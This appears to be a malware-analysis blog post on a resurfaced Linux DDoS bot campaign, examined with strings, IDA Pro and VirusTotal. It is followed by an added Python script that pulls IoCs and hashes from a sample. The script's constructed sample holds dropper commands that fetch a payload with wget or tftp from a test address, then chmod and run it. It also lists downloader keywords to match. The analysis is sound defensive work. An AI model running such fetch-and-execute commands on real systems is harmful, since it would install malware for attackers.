We will start here:
As you can see, the malware is still online (30.04.2020), so please be careful:
I started with strings on my Kali VM. As you can see, there is (again) a 'link to download', so I grabbed the bash file:
The content of the file looks pretty familiar, doesn't it? ;)
Initial check of the hosting server:
I opened the binary in IDA Pro:
Now we can see functions very similar to the list we found in the previous cases (1, 2):
Even the graph overview looks similar ;) OK, strings, strings and more strings... Here we go:
Interesting - checking:
The file again tries to download a copy of the malware. I googled the strings found inside the binary, and this is what I found:
It looks like an old campaign (2018-19) has been started again and is alive ;) A few more similarities from the strings:
I think it's time to check the link mentioned on the page on VirusTotal:
Looks like the same kind of DDoS tool. ;]
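The triage above was done by hand: strings on the binary, pick out the download link, grab the dropper, hash the sample and look it up on VirusTotal. The script below automates that first pass. It is an added example and not the author's tooling; the ELF-like byte blob it runs on is constructed here (RFC 5737 test addresses), not the real sample or the campaign's infrastructure.

```python
"""Static first-pass triage for a dropped ELF sample: mimic `strings -n 4`,
pull out download URLs, IP:port pairs and downloader commands (wget/tftp/...),
and compute the hashes you would paste into VirusTotal.
Added example; SAMPLE below is constructed, not the real malware."""
import hashlib
import json
import re

# URLs and bare IP(:port) strings are the usual "link to download" / C2 hints.
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s'\"<>]+")
HOST_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b")
# Commands that IoT/DDoS droppers typically use to fetch the per-arch payload.
DOWNLOADERS = ("wget ", "curl ", "tftp ", "ftpget ")

# Constructed stand-in for a dropped ELF binary: a header fragment, junk bytes
# and a few embedded strings of the kind seen in such bots (constructed data).
SAMPLE = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
    + b"/bin/busybox\x00"
    + b"wget http://198.51.100.7/bins/x86 -O /tmp/.x; chmod +x /tmp/.x; /tmp/.x\x00"
    + b"\x01\x02\x03"
    + b"tftp -g -r arm7 198.51.100.7\x00"
    + b"GET /bins/mips HTTP/1.0\r\n\x00"
    + b"192.0.2.10:6667\x00"
    + b"\xff\xfe" * 4
)


def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Runs of at least min_len printable ASCII bytes, like `strings -n N`."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def find_iocs(strings: list[str]) -> dict[str, list[str]]:
    """Separate the interesting strings from the noise."""
    urls, hosts, downloads = set(), set(), []
    for s in strings:
        urls.update(URL_RE.findall(s))
        hosts.update(HOST_RE.findall(s))
        if any(tok in s for tok in DOWNLOADERS):
            downloads.append(s)
    return {"urls": sorted(urls), "hosts": sorted(hosts), "download_cmds": downloads}


def hashes(data: bytes) -> dict[str, str]:
    """md5/sha1/sha256 of the whole file, for VirusTotal and sharing IoCs."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in ("md5", "sha1", "sha256")}


def triage(data: bytes) -> dict:
    """One report per sample: size, ELF check, hashes and extracted IoCs."""
    report = {"size": len(data), "is_elf": data[:4] == b"\x7fELF"}
    report.update(hashes(data))
    report.update(find_iocs(extract_strings(data)))
    return report


if __name__ == "__main__":
    # Usage on a real file: triage(open(path, "rb").read())
    print(json.dumps(triage(SAMPLE), indent=2))
```

The hosts list deliberately keeps the address that also appears inside the URL: when the dropper uses tftp as a fallback, the same IP shows up without a scheme, and you want it once in the list regardless of how the bot references it.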
I hope you found it useful. In case of any question(s) - you know how to find me.
Special thanks go to my new Patreons:
- Daniel
- julianvolodia
Thank you! You are AWESOME! ;)
See you next time!
Cheers